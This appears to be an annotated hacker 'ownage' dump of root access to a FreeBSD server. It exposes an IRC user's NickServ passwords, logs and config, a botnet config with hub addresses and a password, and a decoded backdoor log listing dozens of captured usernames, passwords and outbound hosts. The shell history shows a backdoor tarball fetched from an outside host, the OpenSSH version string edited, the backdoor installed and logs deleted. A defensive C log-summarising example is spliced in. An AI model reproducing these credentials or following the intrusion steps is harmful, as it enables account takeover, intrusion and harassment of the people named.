-rw-r--r--  1 romeo  romeo  8466 Feb 20 16:08 fear2.theme
-rw-------  1 romeo  romeo    70 Jun 17 07:31 nickserv.auth
-rw-r--r--  1 romeo  romeo    74 Jun 17 07:31 nickserv.networks
-rw-r--r--  1 romeo  romeo  4667 Jun 27 21:56 pandemonium.theme
drwxr-xr-x  3 romeo  romeo   512 Jun 22 17:50 scripts/
[root@velocity:~]# 

[root@velocity:/home/romeo/.irssi]# cat nickserv.auth 
secchat RoMeO   ve2aZCp3GYoq
bhf     RoMeO   ra7plmyt
tdirc   RoMeO   sidfh928rf783
[root@velocity:~]# 

[root@velocity:/]# cat /usr/home/romeo/.irssi/away.log 
--- Log opened Tue Jun 30 01:08:25 2009
01:23 #bhf: (cc8/connectiong8/:3/RoMeOg) e+
01:34 #bhf: (cc8/connectiong8/:3/RoMeOg) e+
01:42 #bhf: (cc8/HTHg8/:3/RoMeO, romeo, kick this jackass oh romeo?g) e 
02:00 #bhf: (c+c>/connectiong) ethat is a joke RoMeO
--- Log closed Tue Jun 30 04:12:51 2009
--- Log opened Tue Jun 30 19:19:25 2009
19:39 #darkmindz: (cc8/Zer0g8/:3/RoMeO you familiar with Yatra?g) e+
19:44 #darkmindz: (c+c>/Purpleyg) enice RoMeO
19:55 #darkmindz: (c%c>/Biberg) ei dont think that's Romeo
20:00 #darkmindz: (c+c>/Purpleyg) ehow long have you been associated with darkmindz
--- Log closed Tue Jun 30 20:06:56 2009
--- Log opened Tue Jun 30 21:22:55 2009
21:42 #bhf: (c c>/Crooshg) ehttp://romeo.copyandpaste.info/
21:42 #bhf: (c c>/Darkg) eThats still Antisec in the context of self-gain
21:42 #bhf: (c c>/Darkg) eI think theres a legitimate moral standpoint for Antisec
--- Log closed Tue Jun 30 22:17:55 2009
--- Log opened Wed Jul 01 00:59:13 2009
--- Log closed Wed Jul 01 01:00:01 2009
--- Log opened Wed Jul 01 01:00:23 2009
01:00 #bhf: (cc8/connectiong8/:3/RoMeO: he's only blocking all ing) e 
01:00 #bhf: (cc8/HTHg8/:3/RoMeO: raw sockets go below :\g) e+
01:14 #bhf: (cc8/HTHg8/:3/RoMeO: It made sense to me D:g) e+
01:27 #bhf: (c+c>/HTHg) eWhy couldnt Romeo get it that fast D:
01:31 #bhf: (cc8/HTHg8/:3/RoMeO... he didnt get the leet drawing thoughg) e+
01:31 #bhf: (cc8/Darkg8/:3/RoMeOg) e 
01:34 #bhf: (c+c>/HTHg) ehis response:  when you are blocking all out and in i dont see how the fuck are you going to attack an outside box
01:34 #bhf: (cc8/Darkg8/:3/Romeog) e 
01:53 #bhf: (c c>/Darkg) eUsually he said "You're immature and laughable and Antisec is meaningless and e-violent"
01:56 #bhf: (c c>/Darkg) ehttp://www.blackhat-forums.com/topic/6447-underground-is-not-dead/page__view__findpost__p__40605
--- Log closed Wed Jul 01 02:43:40 2009
--- Log opened Wed Jul 01 03:32:17 2009
--- Log closed Wed Jul 01 03:32:22 2009
--- Log opened Wed Jul 01 03:32:24 2009
--- Log closed Wed Jul 01 05:38:09 2009
--- Log opened Wed Jul 01 06:53:32 2009
--- Log closed Wed Jul 01 06:53:36 2009
--- Log opened Wed Jul 01 06:53:44 2009
07:03 #darkmindz: (c&c>/Xiresg) e http://www.blackhat-forums.com/topic/10564-xss-in-wall-ssh-1-putty/
[root@velocity:/]# 


[root@velocity:/home/romeo/.irssi]# cat config
servers = (
  { address = "irc.stealth.net"; chatnet = "IRCNet"; port = "6668"; },
  { address = "irc.efnet.net"; chatnet = "EFNet"; port = "6667"; },
  { 
    address = "irc.undernet.org";
    chatnet = "Undernet";
    port = "6667";
  },
  { address = "irc.dal.net"; chatnet = "DALnet"; port = "6667"; },
  { address = "irc.openprojects.net"; chatnet = "OPN"; port = "6667"; },
  { address = "irc.gnome.org"; chatnet = "GIMPNet"; port = "6667"; },
  { address = "irc.ptlink.net"; chatnet = "PTlink"; port = "6667"; },
  { address = "silc.pspt.fi"; chatnet = "SILC"; port = "706"; },
  {
    address = "irc.securitychat.org";
    chatnet = "secchat";
    port = "6667";
    autoconnect = "yes";
    nick = "RoMeO";
  },
  { 
    address = "irc.blackhat-forums.com";
    chatnet = "bhf";
    port = "6667";
    autoconnect = "yes";
    nick = "RoMeO";
  },
  {
    address = "irc.tdirc.net";
    chatnet = "tdirc";
    port = "6667";
    autoconnect = "yes";
    nick = "RoMeO";
  }
);

chatnets = {
  IRCNet = {
    type = "IRC";
    max_kicks = "4";
    max_modes = "3";
    max_msgs = "5";
    max_whois = "4";
    max_query_chans = "5";
  };
  EFNet = { 
    type = "IRC";
    max_kicks = "4";
    max_modes = "4";
    max_msgs = "3";
  };
  Undernet = {
    type = "IRC";
    max_kicks = "4";
    max_modes = "3";
    max_msgs = "3";
  };
  DALNet = { 
    type = "IRC";
    max_kicks = "4";
    max_modes = "6";
    max_msgs = "3";
  };
  OPN = { type = "IRC"; max_kicks = "4"; max_modes = "4"; max_msgs = "1"; };
  GIMPNet = {
    type = "IRC";
    max_kicks = "4";
    max_modes = "4";
    max_msgs = "3";
  };
  PTLink = {
    type = "IRC";
    max_kicks = "1";
    max_modes = "6";
    max_msgs = "100";
  };
  SILC = { type = "SILC"; };
  secchat = { type = "IRC"; };
  bhf = { type = "IRC"; };
  tdirc = { type = "IRC"; };
};

channels = (

  { name = "#bhf"; chatnet = "bhf"; autojoin = "yes"; },
  { name = "#r00tsecurity"; chatnet = "tdirc"; autojoin = "yes"; },
  { name = "#thedefaced"; chatnet = "tdirc"; autojoin = "yes"; },
  { name = "#zer0zone"; chatnet = "tdirc"; autojoin = "yes"; },
  { name = "#darkmindz"; chatnet = "secchat"; autojoin = "yes"; },
  { name = "#astalavista"; chatnet = "secchat"; autojoin = "yes"; },
  { name = "#kinqpinz"; chatnet = "secchat"; autojoin = "yes"; },
  { name = "#gso-chat"; chatnet = "bhf"; autojoin = "yes"; }
); 

aliases = {
  J = "join";
  WJOIN = "join -window";
  WQUERY = "query -window";
  LEAVE = "part";
  BYE = "quit";
  EXIT = "quit";
  SIGNOFF = "quit";
  DESCRIBE = "action";
  DATE = "time";
  HOST = "userhost";
  LAST = "lastlog";
  SAY = "msg *";
  WI = "whois";
  WII = "whois $0 $0";
  WW = "whowas";
  W = "who";
  N = "names";
  M = "msg";
  T = "topic";
  C = "clear";
  CL = "clear";
  K = "kick";
  KB = "kickban";
  KN = "knockout";
  BANS = "ban";
  B = "ban";
  MUB = "unban *";
  UB = "unban";
  IG = "ignore";
  UNIG = "unignore";
  SB = "scrollback";
  UMODE = "mode $N";
  WC = "window close";
  WN = "window new hide";
  SV = "say Irssi $J ($V) - http://irssi.org/";
  GOTO = "sb goto";
  CHAT = "dcc chat";
  RUN = "SCRIPT LOAD";
  SBAR = "STATUSBAR";
  INVITELIST = "mode $C +I";
};

statusbar = {
  # formats:
  # when using {templates}, the template is shown only if its argument isnt
  # empty unless no argument is given. for example {sb} is printed always,
  # but {sb $T} is printed only if $T isnt empty.

  items = {
    # start/end text in statusbars
    barstart = "{sbstart}";
    barend = "{sbend}";

    # treated "normally", you could change the time/user name to whatever
    time = "{sb $Z}";
    user = "{sb $cumode$N{sbmode $usermode}{sbaway $A}}";

    # treated specially .. window is printed with non-empty windows,
    # window_empty is printed with empty windows
    window = "{sb $winref:$T{sbmode $M}}";
    window_empty = "{sb $winref{sbservertag $tag}}";
    prompt = "{prompt $[.15]T}";
    prompt_empty = "{prompt $winname}";
    topic = " $topic";
    topic_empty = " Irssi v$J - http://irssi.org/help/";

    # all of these treated specially, theyre only displayed when needed
    lag = "{sb Lag: $0-}";
    act = "{sb Act: $0-}";
    more = "-- more --";
  };

  # theres two type of statusbars. root statusbars are either at the top
  # of the screen or at the bottom of the screen. window statusbars are at
  # the top/bottom of each split window in screen.
  default = {
    # the "default statusbar" to be displayed at the bottom of the window.
    # contains all the normal items.
    window = {
      disabled = "no";

      # window, root
      type = "window";
      # top, bottom
      placement = "bottom";
      # number
      position = "1";
      # active, inactive, always
      visible = "active";

      # list of items in statusbar in the display order
      items = {
        barstart = { priority = "100"; };
        time = { };
        user = { };
        window = { };
        window_empty = { };
        lag = { priority = "-1"; };
        act = { priority = "10"; };
        more = { priority = "-1"; alignment = "right"; };
        barend = { priority = "100"; alignment = "right"; };
      };
    };

    # statusbar to use in inactive split windows
    window_inact = {
      type = "window";
      placement = "bottom";
      position = "1";
      visible = "inactive";
      items = {
        barstart = { priority = "100"; };
        window = { };
        window_empty = { };
        more = { priority = "-1"; alignment = "right"; };
        barend = { priority = "100"; alignment = "right"; };
      };
    };

    # we treat input line as yet another statusbar :) Its possible to
    # add other items before or after the input line item.
    prompt = {
      type = "root";
      placement = "bottom";
      # we want to be at the bottom always
      position = "100";
      visible = "always";
      items = {
        prompt = { priority = "-1"; };
        prompt_empty = { priority = "-1"; };
        # treated specially, this is the real input line.
        input = { priority = "10"; };
      };
    };

    # topicbar
    topic = {
      type = "root";
      placement = "top";
      position = "1";
      visible = "always";
      items = {
        barstart = { priority = "100"; };
        topic = { };
        topic_empty = { };
        barend = { priority = "100"; alignment = "right"; };
      };
    };
  };
};
settings = {
  core = {
    real_name = "romeo haxxor"; // "romeo haxxed"
    user_name = "RoMeO";
    nick = "RoMeO";

    timestamp_format = "%H:%M:%S";
    hostname = "absolute.ownage.net"; // absolutely owned..
  };
  "fe-common/core" = {
    autolog = "no";
    autolog_path = "~/irclogs/$tag/$0-%m%y.log";
    show_nickmode_empty = "yes";
    theme = "pandemonium";
    autocreate_own_query = "no";
    autocreate_query_level = "DCCMSGS";
    use_status_window = "no";
    use_msgs_window = "yes";
  };
  "fe-text" = {
    colors = "yes";
    autostick_split_windows = "yes";
    actlist_sort = "refnum";
  };
};
logs = { };
ignores = ( );
keyboard = (
  { key = "meta-1"; id = "change_window"; data = "1"; },
  { key = "meta-2"; id = "change_window"; data = "2"; },
  { key = "meta-3"; id = "change_window"; data = "3"; },
  { key = "meta-4"; id = "change_window"; data = "4"; },
  { key = "meta-5"; id = "change_window"; data = "5"; },
  { key = "meta-6"; id = "change_window"; data = "6"; },
  { key = "meta-7"; id = "change_window"; data = "7"; },
  { key = "meta-8"; id = "change_window"; data = "8"; },
  { key = "meta-9"; id = "change_window"; data = "9"; },
  { key = "meta-0"; id = "change_window"; data = "10"; }
);

hilights = (
  { text = "RoMeO"; nick = "yes"; word = "yes"; },
  { text = "darkmindz"; nick = "yes"; word = "yes"; },
  { text = "antisec"; nick = "yes"; word = "yes"; }, 
  { text = "anti-sec"; nick = "yes"; word = "yes"; },
  { text = "zf0"; nick = "yes"; word = "yes"; },
  { text = "strayfe"; nick = "yes"; word = "yes"; },
  { text = "n3w7yp3"; nick = "yes"; word = "yes"; },
  { text = "copyandpaste"; nick = "yes"; word = "yes"; },
  { text = "blackhat"; nick = "yes"; word = "yes"; },
  { text = "whitehat"; nick = "yes"; word = "yes"; },
  { text = "b0rx"; nick = "yes"; word = "yes"; }
); // I wonder.. zf0?.. Lulz

windows = {
  1 = { };
  2 = { 
    immortal = "yes";
    name = "(msgs)";
    level = "MSGS ACTIONS DCCMSGS";
  };
  3 = {
    items = (
      { 
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#bhf";
        tag = "bhf";
      }
    );
  };
  4 = {
    items = (
      {
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#gso-chat";
        tag = "bhf";
      }
    );
  };
  5 = {
    items = (
      {
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#r00tsecurity";
        tag = "tdirc";
      }
    );
  };
  6 = {
    items = (
      {
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#thedefaced";
        tag = "tdirc";
      }
    );
  };
  7 = {
    items = (
      {
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#zer0zone";
        tag = "tdirc";
      }
    );
  };
  8 = {
    items = (
      {
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#kinqpinz";
        tag = "secchat";
      }
    );
  };
  9 = {
    items = (
      {
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#darkmindz";
        tag = "secchat";
      }
    );
  };
  10 = {
    items = (
      {
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#astalavista";
        tag = "secchat";
      }
    );
  };
};
mainwindows = { 1 = { first_line = "1"; lines = "49"; }; };


[root@velocity:/tmp/...]# cat botnet.conf 
set harryhub "hub 69.42.223.68:7100" ; # the hub ("hubnick ipadress:port")
set harryahub "otis 12.226.117.109:7100" ; # the hub ("althubnick ipadress:port")
set offlinehub 1 ; # run bot in limbomode (1/0) (VERY recomended)
set owner "shoes , rizo" ; # owner(s) ("Jmns")
set botnet_pass "xxlgertg51515150rwf0" ; # just set this to some rand string
set usemsgcmd 0 ; # Enable msg commands (1/0) (not recomended)
source harry.tcl
[root@velocity:/tmp/...]# 

[root@velocity:/]# ls -la
total 129
drwxr-xr-x   22 root  wheel      512 Jun 29 16:00 ./
drwxr-xr-x   22 root  wheel      512 Jun 29 16:00 ../
-rw-r--r--    2 root  wheel      801 Jan 12  2007 .cshrc
drwxr-xr-x    2 root  wheel      512 Jun 29 16:00 .dev/
-rw-r--r--    2 root  wheel      251 Jan 12  2007 .profile
drwxrwxr-x    2 root  operator   512 Apr 12  2007 .snap/
-r--r--r--    1 root  wheel     6196 Jan 12  2007 COPYRIGHT
drwxr-xr-x    2 root  wheel     1024 Apr 16  2007 bin/
drwxr-xr-x    6 root  wheel      512 Apr 16  2007 boot/
drwxr-xr-x    2 root  wheel      512 Apr 12  2007 cdrom/
lrwxr-xr-x    1 root  wheel       10 Apr 12  2007 compat@ -> usr/compat
dr-xr-xr-x    4 root  wheel      512 Dec 31  1969 dev/
drwxr-xr-x    2 root  wheel      512 Apr 12  2007 dist/
-rw-------    1 root  wheel     4096 Apr 16  2007 entropy
drwxr-xr-x   19 root  wheel     2048 Jun 28 21:09 etc/
lrwxrwxrwx    1 root  wheel        8 Apr 12  2007 home@ -> usr/home
drwxr-xr-x    2 root  wheel      512 Apr 12  2007 home2/
-rw-r--r--    1 root  wheel        0 Oct  5  2007 jj.log
lrwxr-xr-x    1 root  wheel       22 Apr 15  2007 kernconf@ -> /usr/src/sys/i386/conf
drwxr-xr-x    3 root  wheel     1024 Nov  5  2008 lib/
drwxr-xr-x    2 root  wheel      512 Apr 16  2007 libexec/
drwxr-xr-x    2 root  wheel      512 Jan 12  2007 media/
drwxr-xr-x    2 root  wheel      512 Jan 12  2007 mnt/
dr-xr-xr-x    2 root  wheel      512 Jan 12  2007 proc/
drwxr-xr-x    2 root  wheel     2560 Nov  5  2008 rescue/
drwxr-xr-x    6 root  wheel      512 Jun 29 08:26 root/
drwxr-xr-x    2 root  wheel     2560 Apr 16  2007 sbin/
lrwxr-xr-x    1 root  wheel       11 Apr 16  2007 sys@ -> usr/src/sys
drwxrwxrwt  103 root  wheel     3072 Jun 29 16:00 tmp/
drwxr-xr-x   24 root  wheel      512 Jun 15 07:35 usr/
drwxr-xr-x   24 root  wheel      512 Jun 15 05:05 var/


[root@velocity:/var/run]# ls -la
total 112
drwxr-xr-x   5 root  wheel      512 Jun 26 21:20 ./
drwxr-xr-x  24 root  wheel      512 Jun 15 05:05 ../
-rw-r--r--   1 root  wheel        0 Jun 25 11:08 a.out
-rw-------   1 root  wheel        0 Jun 25 15:43 as.core
-rw-------   1 root  wheel        3 Jan 27  2008 cron.pid
-rw-r--r--   1 root  wheel        4 Jan 27  2008 devd.pid
srw-rw-rw-   1 root  wheel        0 Jan 27  2008 devd.pipe=
-rw-r--r--   1 root  wheel     5659 Jan 27  2008 dmesg.boot
-rw-------   1 root  wheel        5 Jun 25 08:57 inetd.pid
-r--r--r--   1 root  wheel      245 Jun 23 23:21 ld-elf.so.hints
-r--r--r--   1 root  wheel       67 Jan 27  2008 ld.so.hints
srw-rw-rw-   1 root  wheel        0 Jan 27  2008 log=
srw-------   1 root  wheel        0 Jan 27  2008 logpriv=
drwxr-xr-x   2 bind  bind       512 Jan 12  2007 named/
drwxrwx---   2 root  network    512 Jan 12  2007 ppp/
drwxr-xr-x   2 root  wheel      512 Jan 27  2008 proftpd/
-rw-r--r--   1 root  wheel        4 Jan 27  2008 proftpd.pid
-rw-r--r--   1 root  wheel    14776 Jun 26 20:09 proftpd.scoreboard
-rw-------   1 root  wheel       78 Jan 27  2008 sendmail.pid
-rw-rw-rw-   1 root  wheel     2930 Jun 26 18:08 ssh.old // Backdoor _encrypted_ log file
-rw-r--r--   1 root  wheel        6 Jun 17 18:29 sshd.pid
-rw-------   1 root  wheel        3 Jan 27  2008 syslog.pid
-rw-r--r--   1 root  wheel        0 Jan 27  2008 syslogd.sockets
-rw-r--r--   1 root  wheel     1496 Jun 26 21:31 utmp
[root@velocity:/var/run]# 

[root@velocity:/var/run]# cat ssh.old 



[root@velocity:/var/run]# cat lame.c 
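#include <stdio.h>

/* Prints the bitwise complement (~) of every byte in the given file. */
int main(int argc, char *argv[])
{
  FILE *n00bfile;
  int lamechar;  /* int, so EOF stays distinct from every byte value */
  if(argc < 2) {
          printf("Usage: %s filename\n",argv[0]);
          return 1;  /* no filename given: stop before fopen(NULL) */
  }
  if((n00bfile = fopen(argv[1],"rb"))) {
           while((lamechar = fgetc(n00bfile)) != EOF) {
                            putchar(~lamechar & 0xFF);  /* undo the NOT encoding */
           }
           fclose(n00bfile);
  }
  return 0;
}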

// Let's try out our complex decryption program..

[root@velocity:/var/run]# gcc -o lame lame.c
[root@velocity:/var/run]# rm lame.c 
[root@velocity:/var/run]# ./lame ssh.old 
HOOKIN: romeo:bu9fjogr 
HOOKIN: pimpinjg:1ssgy0ZACGUZFS // Our luvbirdz once again.. This time hidding..:)
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: cpu:lloverAa1
HOOKIN: cpu:lloverAa1
HOOKIN: chaos1:ma012th
HOOKIN: yaquis:closereply456
HOOKIN: smash:n1gwh0re
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKOUT: 98.192.246.70 lag:droppinshitlikeanalien
HOOKOUT: 98.192.246.70 lag:droppinshitlikeanalien
HOOKOUT: 98.192.246.70 l:droppinshitlikeanalien
HOOKOUT: 98.192.246.70 lag:vanity09
HOOKOUT: 98.192.246.70 lag:vanity09
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: matt:zeda02
HOOKIN: yaquis:closereply456
HOOKIN: psycoz:jelesuis
HOOKIN: psycoz:jelesuis
HOOKIN: yaquis:closereply456
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKIN: kruapra:asls0923
HOOKIN: omgwtf:nokiaz
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: ste:tcxm1212
HOOKIN: cazz1961:c4zzy1rcd
HOOKIN: apo:parolka
HOOKIN: apo:parolka
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: chaos1:ma012th
HOOKIN: smash:n1gwh0re
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
HOOKIN: blkgraz:.Blind1.
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: alexbb:noizarte
HOOKOUT: 189.14.205.42 junior:123
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: chaos1:ma012th
HOOKIN: matt:zeda02
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: chaos1:ma012th
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKOUT: 189.14.205.42 junior:123
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKIN: ioplex:I*!@ONLINE
HOOKOUT: 98.192.246.70 cycle:t00L8
HOOKOUT: 98.192.246.70 smash:n1gwh0re
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKIN: ioplex:I*!@ONLINE
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKOUT: 189.14.205.42 junior:123
HOOKOUT: 189.14.205.42 junior:123
HOOKOUT: 98.192.246.70 smash:n1gwh0re
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKOUT: 89.46.100.252 cycle:t00l8
HOOKOUT: 89.46.100.252 cycle:t00L8
HOOKIN: chaos1:ma012th
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKIN: yaquis:closereply456
HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ // puma.makosolutions.com
HOOKOUT: 98.124.176.76 cyber:t00L8
HOOKOUT: 89.46.100.252 cyber:t00l8
HOOKOUT: 98.124.176.76 cycle:t00l8
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: chaos1:ma012th
HOOKIN: ioplex:I*!@ONLINE
HOOKOUT: 89.46.100.252 cycle:t00L8
HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ // puma.makosolutions.com
HOOKIN: chaos1:ma012th
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: kruapra:asls0923
HOOKIN: cmm:skylin3
HOOKIN: chaos1:ma012th
HOOKOUT: 89.46.100.252 cycle:t0L8
HOOKOUT: 89.46.100.252 cycle:t00L8
HOOKOUT: 89.46.100.252 cycle:t00L8
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: katsst:ch0w$ie
HOOKIN: yaquis:closereply456
HOOKIN: smash:n1gwh0re
HOOKIN: smash:n1gwh0re
HOOKIN: smash:n1gwh0re
HOOKIN: smash:n1gwh0re
HOOKIN: katsst:ch0w$ie
HOOKIN: yaquis:closereply456
HOOKIN: yaquis:closereply456
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
HOOKIN: katsst:ch0w$ie
HOOKIN: blkgraz:.Blind1.
HOOKIN: blkgraz:.Blind1.
HOOKIN: blkgraz:.Blind1.
HOOKIN: blkgraz:.Blind1.
HOOKOUT: 89.46.100.252 cycle:t00L8
[root@velocity:/var/run]#

// 0wn3d by y0ur 0wn backd00r.. 
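
The same decode used as an incident-response step (an added example, not code from the original text): it checks that a file is text only after a bitwise NOT, then reduces the HOOKIN/HOOKOUT records to the distinct accounts that need a password reset, without keeping the passwords. It assumes HOOKIN lines are "user:password" and HOOKOUT lines are "host user:password", as the decoded output above reads; all function and struct names are hypothetical and the sample data is constructed.

```c
#include <stdio.h>
#include <string.h>

#define MAX_IDS 32
#define FIELD   48                  /* matches the %47 widths used below */
#define ID_LEN  (2 * FIELD + 2)

/* Constructed sample plaintext (not data from the page); 192.0.2.0/24 is a documentation range. */
static const char SAMPLE_PLAIN[] =
    "HOOKIN: alice:constructed-pw-1\n"
    "HOOKIN: alice:constructed-pw-1\n"
    "HOOKOUT: 192.0.2.10 bob:constructed-pw-2\n"
    "HOOKIN: carol:constructed-pw-3\n"
    "HOOKOUT: 192.0.2.10 bob:constructed-pw-2\n"
    "garbage line\n";

struct hook_summary {
    int inbound, outbound, malformed;   /* record counts */
    int n_ids;                          /* distinct identities to reset */
    char ids[MAX_IDS][ID_LEN];          /* "user" or "user@host"; passwords are dropped */
};

/* Share of bytes that are printable ASCII or whitespace, optionally after ~. */
static double text_ratio(const unsigned char *buf, size_t len, int complement)
{
    size_t ok = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = complement ? (unsigned char)~buf[i] : buf[i];
        if ((c >= 0x20 && c <= 0x7e) || c == '\n' || c == '\r' || c == '\t')
            ok++;
    }
    return len ? (double)ok / (double)len : 0.0;
}

/* 1 when the raw bytes are not text but their bitwise complement is. */
int looks_complement_encoded(const unsigned char *buf, size_t len)
{
    return text_ratio(buf, len, 0) < 0.5 && text_ratio(buf, len, 1) > 0.95;
}

/* Record an identity once; repeats of the same login are collapsed. */
static void add_id(struct hook_summary *s, const char *id)
{
    for (int i = 0; i < s->n_ids; i++)
        if (strcmp(s->ids[i], id) == 0) return;
    if (s->n_ids < MAX_IDS)
        snprintf(s->ids[s->n_ids++], ID_LEN, "%s", id);
}

/* Classify one decoded line; %n is only reached when the ':' separator is present. */
static void parse_line(struct hook_summary *s, const char *line)
{
    char host[FIELD], user[FIELD], id[ID_LEN];
    int n = 0;
    if (sscanf(line, "HOOKIN: %47[^: \n]:%n", user, &n) == 1 && n > 0) {
        s->inbound++;
        add_id(s, user);
        return;
    }
    n = 0;
    if (sscanf(line, "HOOKOUT: %47[^ \n] %47[^: \n]:%n", host, user, &n) == 2 && n > 0) {
        s->outbound++;
        snprintf(id, sizeof id, "%s@%s", user, host);
        add_id(s, id);
        return;
    }
    s->malformed++;
}

/* Decode and summarize; returns -1 if the buffer is not complement-encoded text. */
int summarize_hook_log(const unsigned char *buf, size_t len, struct hook_summary *s)
{
    char line[256];
    size_t n = 0;
    memset(s, 0, sizeof *s);
    if (!looks_complement_encoded(buf, len)) return -1;
    for (size_t i = 0; i <= len; i++) {
        char c = (i < len) ? (char)(unsigned char)~buf[i] : '\n';  /* flush last line */
        if (c == '\n') {
            line[n] = '\0';
            if (n > 0) parse_line(s, line);
            n = 0;
        } else if (n + 1 < sizeof line) {
            line[n++] = c;
        }
    }
    return 0;
}

/* Build the encoded sample by complementing the constructed plaintext. */
size_t build_sample(unsigned char *out, size_t cap)
{
    size_t n = strlen(SAMPLE_PLAIN);
    if (n > cap) n = cap;
    for (size_t i = 0; i < n; i++)
        out[i] = (unsigned char)~(unsigned char)SAMPLE_PLAIN[i];
    return n;
}

int main(void)
{
    unsigned char enc[sizeof SAMPLE_PLAIN];
    struct hook_summary s;
    size_t n = build_sample(enc, sizeof enc);
    if (summarize_hook_log(enc, n, &s) != 0) return 1;
    printf("inbound=%d outbound=%d malformed=%d\n", s.inbound, s.outbound, s.malformed);
    for (int i = 0; i < s.n_ids; i++)
        printf("reset: %s\n", s.ids[i]);
    return 0;
}
```
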


[root@velocity:~]# cat /etc/profile 
# $FreeBSD: src/etc/profile,v 1.14 2004/06/06 11:46:27 schweikh Exp $
#
# System-wide .profile file for sh(1).
#
# Uncomment this to give you the default 4.2 behavior, where disk
# information is shown in K-Blocks
# BLOCKSIZE=K; export BLOCKSIZE
#
# For the setting of languages and character sets please see
# login.conf(5) and in particular the charset and lang options.
# For full locales list check /usr/share/locale/*
# You should also read the setlocale(3) man page for information
# on how to achieve more precise control of locale settings.
#
# Read system messages
# msgs -f
# Allow terminal messages
# mesg y
export PS1="[\u@\h:\w]\\$ "
alias ls='/bin/ls -GFa'
alias ll='/bin/ls -GFal'
alias lo='/bin/ls -GFalo'
export LSCOLORS=ExGxFxf5CxfgDxabagacad
export EDITOR=pico
TMOUT=1800

export HISTFILE=~/.bshrc // Bypassing backdoor HISTFILE=/dev/null
export HISTSIZE=1500   

[root@velocity:~]# 

// After a while... 

[root@velocity:~]# cat /root/.bshrc 
w
rm -rf hax
rm -rf lol.tar.gz
ls -la
exit
w
wget http://board.whois.co.kr/lol.tar.gz // See attachments section for lol.tar.gz backdoor
tar -zxf lol.tar.gz
cd hax 
ls -la 
ssh -v 
vi version.h // OpenSSH Version editing
./quick // Installation
cd .. 
ls -la
cd /home/romeo/
ls -la
cat  .bash_history
ls -la
cd .irssi/
ls -la
rm -rf away.log // Too late..
cd ..
ls -la
w
ps aux | grep ssh
netstat -an | grep :22 // See the remaining 18 netstats.. not counting who and kills.. 
netstat -an | grep 22
netstat -an | grep ssh
netstat -a | grep 22
netstat -an | grep .22
env
netstat -an | grep 188.51.85.13
netstat -an | grep 248.22
w
netstat -anp | grep 248.22
netstat -an | grep 248.22
whois 98.242.244.25
ps aux | grep ssh
kill -9 8095
kill -9 8128
kill -9 8866
ps aux | grep ssh
kill -9 92546
kill -9 93418
w
env
netstat -an | grep 188.51.85.13
netstat -an | grep .248.22
w
ls -al
cat > w
sh x
sh w
ls -la
bas w
bash w
ls -la
cat w
netstat -tanp 
ps aux | grep ssh
kill -9 43929
kill -9 75936
kill -9 75934
ps aux | grep ssh
kll -9 23783
kill -9 23783
ps aux | grep ssh
time
date
ls -la
chmod +x w
./w
ls -la
rm -f w
ps aux | grep ssh
kill -9 22353
 ps aux | grep ssh
kill -9 9078
 ps aux | grep ssh
env
netstat -an | grep 188.51.85.13
netstat -an | grep .248.22
csf
last | grep 98.242.244.25
lastlog
w
ls -la
netstat -anp tcp
netstat -anp tcp | grep .22
netstat -anp tcp | grep 72.20.28.226.6697
netstat -anp
netstat -anp tcp
sockstat
ps aux | grep ioplex
exit
w
cd ~pimpinjg/
ls -la
cat .bash_history
w
ls -la
cd /
ls -la
cd /tmp
ls -la
cd /var/log
ls -la
